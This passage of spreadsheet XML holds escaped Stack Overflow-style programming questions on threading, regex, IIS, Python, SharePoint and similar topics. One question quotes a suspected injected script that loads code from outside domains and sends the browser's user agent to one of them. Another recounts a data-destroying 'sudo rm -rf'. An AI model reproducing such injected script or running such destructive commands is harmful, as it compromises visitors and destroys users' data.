&lt;p&gt;then all is well. Since I have no other rules in the test case I'm running that contains ul or li in the selector, I'm not sure why inlining gives a different result.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Suspending and notifying threads when there is work to do</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have multiple threads (C# application running on IIS) running that all need to communicate with the same MQ backend.  To minimize network traffic, I need to only send a backend request when there is work to be done.  There will be one thread to monitor if there is work to be done, and it needs to notify the other threads that they should also begin processing.  The current solution involves the monitor thread setting a global variable and having the other threads loop and check that, ie in the monitor thread:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CheckIfWorkAvailable() {
  while(true) {
    if (queue.Empty != true) {
      workToBeDone = true;
    }
  }//end while loop
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and then in the worker threads:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DoWork() {
  while(true) {
    if (workToBeDone == true) {
      //do work...
    }
    else {
      Thread.Sleep(x seconds)
    }
  }//end while loop
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can the monitor thread notify the worker threads when there is work to do instead of having them just loop and sleep?  The worker threads also set a counter indicating they are working and the decrement it when their work is done so the workToBeDone flag can be set to false.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regex greedy issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm sure this one is easy but I've tried a ton of variations and still cant match what I need.  The thing is being too greedy and I cant get it to stop being greedy.&lt;/p&gt;
&lt;p&gt;Given the text:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;test=this=that=more text follows
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to just select:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;test=
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried the following regex&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(\S+)=(\S.*)
(\S+)?=
[^=]{1}
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks all.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Remove a symlink to a directory</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a symlink to an important directory. I want to get rid of that symlink, while keeping the directory behind it.  &lt;/p&gt;
&lt;p&gt;I tried &lt;code&gt;rm&lt;/code&gt; and get back &lt;code&gt;rm: cannot remove 'foo'&lt;/code&gt;.&lt;br&gt;
I tried &lt;code&gt;rmdir&lt;/code&gt; and got back &lt;code&gt;rmdir: failed to remove 'foo': Directory not empty&lt;/code&gt;&lt;br&gt;
I then progressed through &lt;code&gt;rm -f&lt;/code&gt;, &lt;code&gt;rm -rf&lt;/code&gt; and &lt;code&gt;sudo rm -rf&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Then I went to find my back-ups.&lt;/p&gt;
&lt;p&gt;Is there a way to get rid of the symlink with out throwing away the baby with the bathwater?   &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why so many web pages contain such a strange code snippet in header?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've noticed for quite a long time that strange domains such like jsev.com, cssxx.com appered in my firefox status bar from time to time, I always wonder why so many web pages contains resources from these strange domains. I googled it, but found nothing. I guess it's some kind of virus which infect the servers and insert the code. Here is a sample taken from page header of &lt;a href="http://www.eflorenzano.com/threadexample/blog/" rel="nofollow"&gt;http://www.eflorenzano.com/threadexample/blog/&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script language="javascript" src="http://i.jsev.com./base.2032621946.js"&amp;gt; &amp;lt;/script&amp;gt;
&amp;lt;body onmousemove="return fz3824();"&amp;gt;
&amp;lt;LINK REL="stylesheet" TYPE="text/css" HREF="http://i.cssxx.com./base2032621947.css"&amp;gt;
&amp;lt;A HREF = "http://i.html.com./base2032621947.html"&amp;gt;&amp;lt;/A&amp;gt;
&amp;lt;SCRIPT LANGUAGE="JAVASCRIPT" SRC="http://i.js.com./base2032621947.js"&amp;gt;&amp;lt;/SCRIPT&amp;gt;
&amp;lt;SCRIPT LANGUAGE="JAVASCRIPT"&amp;gt;
function getuseragnt()
{ var agt = navigator.userAgent.toLowerCase();
  agt = agt.replace(/ /g, "");
  return agt;
}
document.write("&amp;lt;LINK REL='stylesheet' TYPE='text/css' HREF='http://i.css2js.com./base.css" + getuseragnt() + "_2032621947'&amp;gt;") 
&amp;lt;/SCRIPT&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;edit: I am on a debian box, only on firefox I see this code, I just tried opera, this code doesn't appear in opera, really strange, never heard of firefox having such problems.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I attach the debugger to IIS instead of ASP.NET Development Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an ASP.NET website and when I press F5 it automatically attaches to the ASP.NET Development Server, how do I attach to IIS worker process instead when I press F5?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Software patents or Can I write a RSVP program for my mobile device?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wanted to write a small &lt;a href="http://en.wikipedia.org/wiki/Rapid_Serial_Visual_Presentation" rel="nofollow"&gt;Rapid Serial Visual Presentation (RSVP)&lt;/a&gt; program for my mobile device but I realized that there are some patent issues associated with that technique (&lt;a href="http://www.freepatentsonline.com/EP1275051.html" rel="nofollow"&gt;exhibit 1&lt;/a&gt; and &lt;a href="http://patft.uspto.gov/netacgi/nph-Parser?Sect2=PTO1&amp;amp;Sect2=HITOFF&amp;amp;p=1&amp;amp;u=%2Fnetahtml%2Fsearch-bool.html&amp;amp;r=1&amp;amp;f=G&amp;amp;l=50&amp;amp;d=PALL&amp;amp;RefSrch=yes&amp;amp;Query=PN%2F6056551" rel="nofollow"&gt;exhibit 2&lt;/a&gt;). &lt;/p&gt;
&lt;p&gt;Can I write such program and try to make money with it? Would it be legal to give such program for free?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the aspnet_client folder for under the IIS structure?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I notice that there's frequently an aspnet_client folder under the standard IIS web folder structure. What is this used for? Is it needed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Try to describe polymorphism as easy as you can</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can polymorphism be described in an easy-to-understand way?&lt;/p&gt;
&lt;p&gt;We can find a lot of information about the subject on the Internet and books, like in &lt;em&gt;&lt;a href="http://en.wikipedia.org/wiki/Type_polymorphism"&gt;Type polymorphism&lt;/a&gt;&lt;/em&gt;. But let's try to make it as simple as we can.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>QR decoder that works on mac?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone know a QR decoder that works on mac or that might be online? I just need to decode one single image.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How secure are CGI based web apps?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A very well known major drawback of using CGI is poor webserver performance. But how secure are CGI (mainly C/C++) based applications? Are there any major security holes in CGI architecture built on C/C++? &lt;/p&gt;
&lt;p&gt;I would like to know some real life implementations of CGI based web apps/web sites. One that I know of is javaranch.com. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does scanf() need "%lf" for doubles, when printf() is okay with just "%f"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why is it that &lt;code&gt;scanf()&lt;/code&gt; needs the &lt;code&gt;l&lt;/code&gt; in "&lt;code&gt;%lf&lt;/code&gt;" when reading a &lt;code&gt;double&lt;/code&gt;, when &lt;code&gt;printf()&lt;/code&gt; can use "&lt;code&gt;%f&lt;/code&gt;" regardless of whether its argument is a &lt;code&gt;double&lt;/code&gt; or a &lt;code&gt;float&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;Example code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;double d;
scanf("%lf", &amp;amp;d);
printf("%f", d);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>ASP.NET HTTP handlers and global variables</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created HTTP handlers. &lt;/p&gt;
&lt;p&gt;How do I create global variables for these handlers like I can with ASP.net web pages in  global.asax?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Validate image from file in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm loading an image from a file, and I want to know how to validate the image before it is fully read from the file.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string filePath = "image.jpg";
Image newImage = Image.FromFile(filePath);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem occurs when image.jpg isn't really a jpg.  For example, if I create an empty text file and rename it to image.jpg, an OutOfMemory Exception  will be thrown when image.jpg is loaded.&lt;/p&gt;
&lt;p&gt;I'm looking for a function that will validate an image given a stream or a file path of the image.&lt;/p&gt;
&lt;p&gt;Example function prototype&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bool IsValidImage(string fileName);
bool IsValidImage(Stream imageStream);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What data type do you use for storing IDs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why is there a minimum character count for posting questions? o.O&lt;/p&gt;
&lt;p&gt;Do you use int, bigint, tinyint, whatever?&lt;/p&gt;
&lt;p&gt;It seems like a small thing I guess, I was just wondering what the usual practice is&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you find the web security issue here?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a webpage that redirects to another webpage like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then the Sponsor.php page displays an ad with a link saying "Continue to your page" that links to the passed in RedirectPage.  Are there security/spoofing issues that could come from this?  What is the best way to handle this?  (note that the user is not logged in to either site)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python's __import__ doesn't work as expected</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When using &lt;code&gt;__import__&lt;/code&gt; with a dotted name, something like: &lt;code&gt;somepackage.somemodule&lt;/code&gt;, the module returned isn't &lt;code&gt;somemodule&lt;/code&gt;, whatever is returned seems to be mostly empty! what's going on here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python Inverse of a Matrix</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I get the inverse of a matrix in python? I've implemented it myself, but it's pure python, and I suspect there are faster modules out there to do it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I extract and save text using Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;No extracted data output to data2.txt? What goes wrong to the code?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MyFile.txt&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ex1,fx2,xx1
mm1,nn2,gg3
EX1,hh2,ff7
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is my desired output in data2.txt:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ex1,fx2,xx1
EX1,hh2,ff7
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;br&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#! /DATA/PLUG/pvelasco/Softwares/PERLINUX/bin/perl -w
my $infile  ='My1.txt';
my $outfile ='data2.txt';
open IN,  '&amp;lt;', $infile  or die "Cant open $infile:$!";
open OUT, '&amp;gt;', $outfile or die "Cant open $outfile:$!";
while (&amp;lt;IN&amp;gt;) {   
  if (m/EX$HF|ex$HF/) {
    print OUT $_, "\n";      
    print $_;   
  }
}
close IN;
close OUT;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How does traceroute work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It seems almost magical. What is the traceroute command doing in order to map out the entire path to some other node on the Internet?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Updating Access 2003 to 2007, potential issues?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've written an Access 2003 application to handle internal things at my company over the past couple years and we are talking about upgrading all of our computers to Office 2007 which means Access will be updated.  Is this going to cause a problem for me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does COM registration work in Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm an application packager trying to make sense of how the COM registry keys (SelfReg) interrelate to the given .dll in Windows.&lt;/p&gt;
&lt;p&gt;ProgID's, AppID's, TypeLibs, Extensions &amp;amp; Verbs are all tied around the CLSID right?
Do CLSID's always use Prog/App IDs or could you just have a file extension class?
Which bits are optional? &lt;/p&gt;
&lt;p&gt;Some of it seems to be 'like a router' where there's the two interfaces (internal - .dll) and external (the extension etc).&lt;/p&gt;
&lt;p&gt;How does this all fit?  (The SDK documentation doesn't make sense to me)&lt;/p&gt;
&lt;p&gt;I ask as this is all pivotal to application 'healing' with Windows Installer (which packagers are all 'big' on, but there's no nitty-gritty breakdowns since its a coder-thing really)&lt;/p&gt;
&lt;p&gt;---Edit:
Am I safe in assuming that for what COM is registered, it must all link back to the CLSID and cannot be a 'dead-end'? 
Verbs need extensions which need progid's...&lt;/p&gt;
&lt;p&gt;What about the AppId's, TypeLibs and Interfaces?  How do they interrelate?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Lightweight messaging (async invocations) in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for lightweight messaging framework in Java. My task is to process events in a SEDAâ€™s manner: I know that some stages of the processing could be completed quickly, and others not, and would like to decouple these stages of processing.&lt;/p&gt;
&lt;p&gt;Letâ€™s say I have components A and B and processing engine (be this container or whatever else) invokes component A, which in turn invokes component B. I do not care if execution time of component B will be 2s, but I do care if execution time of component A is below 50ms, for example. Therefore, it seems most reasonable for component A to submit a message to B, which B will process at the desired time.&lt;/p&gt;
&lt;p&gt;I am aware of different JMS implementations and Apache ActiveMQ: they are too heavyweight for this. I searched for some lightweight messaging (with really basic features like messages serialization and simplest routing) to no avail.&lt;/p&gt;
&lt;p&gt;Do you have anything to recommend in this issue?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eclipse, where to change the current debug line background?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone point me to the preferences page that has the setting of the &lt;strong&gt;DEBUG&lt;/strong&gt; current line background color? I have changed almost all the colours to dark ones and still get annoyed by this almost white current line indicator while debugging (note that the current line indication in editing mode is OK).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to change the properties of a WebReference in run-time?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to come up with such a solution that the user is going to enter the URL of a web-service and it is going to be tested.&lt;/p&gt;
&lt;p&gt;Although what I want is a URL change, I guarantee the Service Description is always going to be the same (except the wsdl:service tag of course which contains the soap:address); I just want to test different customers, running the same service.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why global.asax Application_Error method does not catch exceptions thrown by ASMX service?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;And how to fix it. I'd like to log every thrown exception for maintenance purpose.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Safari/WebKit table over-run when using whitespace: nowrap</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Having a strange rendering issue with Safari: &lt;/p&gt;
&lt;p&gt;I have a table inside a div. Inside the table &amp;lt;td&amp;gt; I have lots of div's floated left. So the normal display is all of the divs within the td stacked up to the left until they fill the width, then flow to the next line, and so forth. So something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;|===========================|
|  |---------------------|  |
|  | XXX  XXX  XXX  XXX  |  |
|  | XXX  XXX            |  |
|  |                     |  |
|  |----------------------  |
|===========================|
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That works in all browsers except safari/webkit, where it ends up something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;|===========================|
|  |-------------------------------|
|  | XXX  XXX  XXX  XXX  XXX  XXX  |
|  |                               |
|  |-------------------------------|
|===========================|
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Update: Finally figured out the issue: my inner divs (the "XXX"s) had &lt;code&gt;white-space: nowrap&lt;/code&gt;. Apparently webkit was no-wrap'ing the entire list of divs instead of applying the nowrap within the div. &lt;/p&gt;
&lt;p&gt;That was a nasty one.&lt;/p&gt;
&lt;p&gt;(This had nothing to do with display:none)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASDoc through the Flex Builder UI?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to run ASDoc on your project via the Flex Builder UI?  Or, is there a good (preferably free) plugin that will do so?&lt;/p&gt;
&lt;p&gt;If there is no UI for it, does someone have a link to a tutorial on how to set it up to be automatic when I build my project, maybe via Ant (which I've never used, but am more than happy to try) or something?
(sorry for the multi-part question)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP generating XML, time-outs randomly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have no idea. This causes seemingly random time-outs. These in turn break the flash that i am loading it into. Has anyone seen anything like this before?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
require_once("../includes/class.database.php");
require_once("../includes/dbConnectInfo.inc");
require_once("../includes/functions.php");
include("../includes/conn.php");
$cat = $_GET['category'];
$result = mysql_query("SELECT * FROM media WHERE related_page_id=4 &amp;amp;&amp;amp; type='copy' ORDER BY id ASC LIMIT 6");
$media = "&amp;lt;?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?&amp;gt;\n";
$media .= "&amp;lt;content&amp;gt;\n";
while($row = mysql_fetch_array($result))
{
	$media .="&amp;lt;member&amp;gt;\n";
	$body = $row[copy];
	if($row[title] == "")
		{
			$media .= "&amp;lt;title&amp;gt;&amp;lt;![CDATA[";
			$media .= "Team";
			$media .="]]&amp;gt;&amp;lt;/title&amp;gt;\n";
		}elseif($row['path']==""){
			$name = explode("/",$row[title],2);
			$media .= "&amp;lt;name&amp;gt;&amp;lt;![CDATA[";
			$media .= $name[0];
			$media .="]]&amp;gt;&amp;lt;/name&amp;gt;\n";
			$media .= "&amp;lt;job&amp;gt;&amp;lt;![CDATA[";
			$media .= $name[1];
			$media .="]]&amp;gt;&amp;lt;/job&amp;gt;\n";
		} 
	if($body !="")
	{
	$media .="&amp;lt;bio&amp;gt;&amp;lt;![CDATA[";
	$media .= $body;
	$media .= "]]&amp;gt;&amp;lt;/bio&amp;gt;\n";
	}
	$something = $row['id'];
	$result1 = mysql_query("SELECT * FROM media WHERE assets='$something'");
	$media .= "&amp;lt;images&amp;gt;";
	while($row1 = mysql_fetch_array($result1))
	{
		$img = explode("/",$row1[path],2);
		$media .= "&amp;lt;image url='$img[1]' /&amp;gt;";
	}
	$media .= "&amp;lt;/images&amp;gt;\n";
	$media .="&amp;lt;/member&amp;gt;\n";
}	
$media .= "&amp;lt;/content&amp;gt;";
echo $media;
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C++ to Perl/Tk</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to do a college project using C++. It also requires a GUI and I want to use Perl/Tk for the Gui, but am not sure how to link the C++ to the Perl. The project requires being able to pass variables back and forth. Could anyone point me in the direction of some good tutorials/books for linking the two? Or any ideas on how I should approach the problem as I have never had to link two languages before.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to deal with an Undocumented API/Framework under .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For work I have to code with an external company's API to deal with their proprietary database solution. Unfortunately the documentation they provide is more of an example guide then proper API docs, so it is very light on nitty gritty details like error codes, method returns, and exceptions. &lt;/p&gt;
&lt;p&gt;So for instance, a class will have a .GetErrorCode() method, but I have no idea what those error numbers mean because they didn't document what number matches up with what error. In many cases a method will return an Object, with no documentation of what the type of Object it actually returns. I have asked them repeatedly for proper documentation but they seem to think details like the ones above are propriety secrets. So, is there any tools or methods I can work around my limited or in some cases non-existent documentation.&lt;/p&gt;
&lt;p&gt;Please note that I am using Visual Studo 2005 and coding in C# under .Net.&lt;/p&gt;
&lt;p&gt;And before anyone answers, "don't use the API", I have to, it is for work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In a spring configuration, what is the difference between using name vs id?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a spring configuration, what is the difference between using name vs id?   I'm aware that XML restricts the "id" attribute to be unique in a document and limits the characters for using in the id.   But otherwise when declaring a bean, what is the difference between using the "name" attribute vs the "id" attribute?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Berkley packet filter for Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is Berkley Packet Filter supported on Windows or is there something comparable which I should use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the appropriate layer for string parsing in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Consider a standard ASP.NET web application where the user types in some numeric data on a form.  On submitting, some business objects are spun up to operate on the numeric data.  But server-side textbox controls in .Net return a value of type string.  Question: Should the codebehind of the page take responsibility for parsing the strings into numeric data (and throwing errors if invalid), or should the business objects accept strings for their input and parse them themselves?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should application architects write code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is an often-asked question that has views on both side. Those in favour will argue:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;To design a system for coders you must understand how to code (and be coding)&lt;/li&gt;
&lt;li&gt;You can't design a system without being aware of what is happening at ground level&lt;/li&gt;
&lt;li&gt;Architecture is not just about broad stroke design but about adapting to changing needs at the code level&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;on the other hand,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Architecture is a high-level role and should be not be concerned about implementation details&lt;/li&gt;
&lt;li&gt;Coding is a detailed oriented, heads-down funtion which is at odds with the risk management, broad view nature of architecture&lt;/li&gt;
&lt;li&gt;Architecture is about technical risk management and not implementation&lt;/li&gt;
&lt;li&gt;Architecture is about leadership. It's difficult to lead from behind&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In my experience architects should not be spending a lot of time coding but must keep in touch with the code base primarily through lead developer communication, review and stand ups. If you spend a lot of time coding you lose sight of the high level issues and become ineffective at managing technical risk.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When does a project not require an application architect?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do moderate or large projects ever not require an architect? I have worked on a number of projects where the development company involved has choosen not to assign an application architect. Either the software is built organically and with little concern for design or the design responsibility falls to senior developers.&lt;/p&gt;
&lt;p&gt;The motivations for not having an architect range from cost considerations to believing that the development methodology makes the architectural role unnecessary (this argument could be made for agile development). Some open source projects work on the principle of collective contribution rather than development with architectural leadership.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which annotation should I use: @IdClass or @EmbeddedId</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The &lt;code&gt;JPA&lt;/code&gt; (Java Persistence API) specification has 2 different ways to specify entity composite keys: &lt;code&gt;@IdClass&lt;/code&gt; and &lt;code&gt;@EmbeddedId&lt;/code&gt;. &lt;/p&gt;
&lt;p&gt;I'm using both annotations on my mapped entities, but it turns out to be a big mess to people who aren't very familiar with &lt;code&gt;JPA&lt;/code&gt;. &lt;/p&gt;
&lt;p&gt;I want to adopt only one way to specify composite keys. Which one is really the best? Why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should database variable-length text fields be powers of 2?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A friend of mine claims that in a typical database, using (for example) &lt;code&gt;nvarchar[256]&lt;/code&gt; will give marginally better performance than &lt;code&gt;nvarchar[200]&lt;/code&gt; or &lt;code&gt;nvarchar[250]&lt;/code&gt; because of the granularity of page allocations.&lt;/p&gt;
&lt;p&gt;Is there any truth to this whatsoever?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add a new SharePoint alert via Web Services</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I found the Alert Service but it only seems to have methods for Getting and Deleting.  How do I add a new alert?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the easiest way to encrypt a password when I save it to the registry?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Currently I'm writing it in clear text &lt;em&gt;oops!&lt;/em&gt;, it's an in house program so it's not that bad but I'd like to do it right. How should I go about encrypting this when writing to the registry and how do I decrypt it?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;OurKey.SetValue("Password", textBoxPassword.Text);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>a script on this page is causing ie to run slowly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The problem is in the title - IE is misbehaving and is saying that there is a script running slowly - FF and Chrome don't have this problem.&lt;/p&gt;
&lt;p&gt;How can I find the problem . .there's a lot of JS on that page. Checking by hand is not a good ideea&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT :&lt;/strong&gt; It's a page from a project i'm working on... but I need a tool to find the problem.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;End :&lt;/strong&gt; It turned out to be the UpdatePanel - somehow it would get "confused" and would take too long to process something. I just threw it out the window - will only use JQuery from now on :D.&lt;/p&gt;
&lt;p&gt;And I'm selecting Remy Sharp's answere because I really didn't know about the tool and it seems pretty cool.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Scrum/Agile: How do you plan in internal improvements?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have now worked on two different teams that use the Agile/Scrum approach in the last two years and both teams were eager to improve the way they approach software development. In the first team, we could easily convince our product owner to get time for internal things like improving the build system, setting up better integration tests, having a better release strategy etc. Right now the PO is also willing to give us time, but he is more pushing back, which is reasonable as he also must get his things done. &lt;/p&gt;
&lt;p&gt;Anyway my question is now, how do other teams handle this? Do you create an improvement story and put it on the table during planning or do you keep a "bucket" of time around for such things? How difficult is it in your experience to convince the product owner to do get time for improving? After all these kind of improvements will benefit the team, but not directly or immediately the prodcut owner/business.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Advantages of Antlr (versus say, lex/yacc/bison)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've used lex and yacc (more usually bison) in the past for various projects, usually translators (such as a subset of EDIF streamed into an EDA app). Additionally, I've had to support code based on lex/yacc grammars dating back decades. So I know my way around the tools, though I'm no expert.&lt;/p&gt;
&lt;p&gt;I've seen positive comments about Antlr in various fora in the past, and I'm curious as to what I may be missing. So if you've used both, please tell me what's better or more advanced in Antlr. My current constraints are that I work in a C++ shop, and any product we ship will not include Java, so the resulting parsers would have to follow that rule.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Simple C++ UML w/ reverse engineering</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a way to build C++ code from UML diagrams and vice versa. &lt;/p&gt;
&lt;p&gt;Should be simple too hopefully. I don't mind paying too much.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I fill in a Sharepoint List edit form offline using Windows Mobile 5.0 Quickly?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a method for a user to quickly enter info using a Handheld Symbol MC9090 scanner running windows Mobile 5.0 from a power off state&lt;/p&gt;
&lt;p&gt;Currently it takes approx 1 min from power off state for user to enter data into a sharepoint list. I need to get the time down to seconds. 
It takes approx 30secs for handheld to establish wireless connection and another 30 seconds for user to connect to server&lt;/p&gt;
&lt;p&gt;Currently we have Symbol MC9090 scanners running windows Mobile 5.0. The user has to use terminal services to connect to a server were they then enter info. We use terminal services because mobile internet explorer doesn't work well with sharepoint forms we are using and is slow.&lt;/p&gt;
&lt;p&gt;I have yet to find an easy method to create custom mobile forms for sharepoint lists.&lt;/p&gt;
&lt;p&gt;Is it possible to create an app that would collect data on the mobile and when the wireless connection was active sync the local data with the server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MovieClip isn't removed from Dictionary</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Dictionary where I hold data for movieclips, and I want the data to be garbage collected if I stop using the movieclips. I'm using the weak keys parameters, and it works perfectly with other data, however I've run into a problem. &lt;/p&gt;
&lt;p&gt;This code works great:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var mc = new MovieClip();
var dic = new Dictionary(true);
dic[mc] = 12;
mc = null;
System.gc();
System.gc();
for (var obj in dic)
   trace(obj);    //this doesn't execute
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But when I actually use the movieclip, it stops working:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var mc = new MovieClip();
var dic = new Dictionary(true);
dic[mc] = 12;
addChild(mc);
removeChild(mc);
mc = null;
System.gc();
System.gc();
for (var obj in dic)
   trace(obj);    //this prints [object Movieclip]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why does this happen? Is it something I'm doing wrong? Is there a workaround?&lt;/p&gt;
&lt;p&gt;Edit: I know that for this specific example I can use &lt;code&gt;delete dic[mc]&lt;/code&gt;, but of course this is a simplified case. In general, I don't want to manually have to remove the movieclip from the dictionary, but it should be automatic when I don't reference it anymore in the rest of the application.&lt;/p&gt;
